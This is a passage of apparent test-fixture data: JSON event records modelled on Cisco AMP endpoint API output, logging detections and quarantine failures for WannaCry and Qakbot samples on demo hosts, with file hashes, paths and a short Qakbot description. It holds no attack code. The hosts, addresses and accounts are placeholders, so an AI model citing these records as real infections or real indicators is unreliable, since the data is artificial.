Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qYf.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4191700.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1493058569636000800,"timestamp":1610633340,"timestamp_nanoseconds":636000000,"date":"2021-01-14T14:09:00+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610633340,"start_date":"2021-01-14T14:09:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":611000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":65000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772012435046000,"timestamp":1610631959,"timestamp_nanoseconds":940000000,"date":"2021-01-14T13:45:59+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772012435046402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Unconfirmed 762952.crdownload","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741861","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741860","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741861","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":350000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741860","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":225000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":210000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":194000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":178000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":163000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214492323807000,"timestamp":1610631810,"timestamp_nanoseconds":447000000,"date":"2021-01-14T13:43:30+00:00","event_type":"Threat 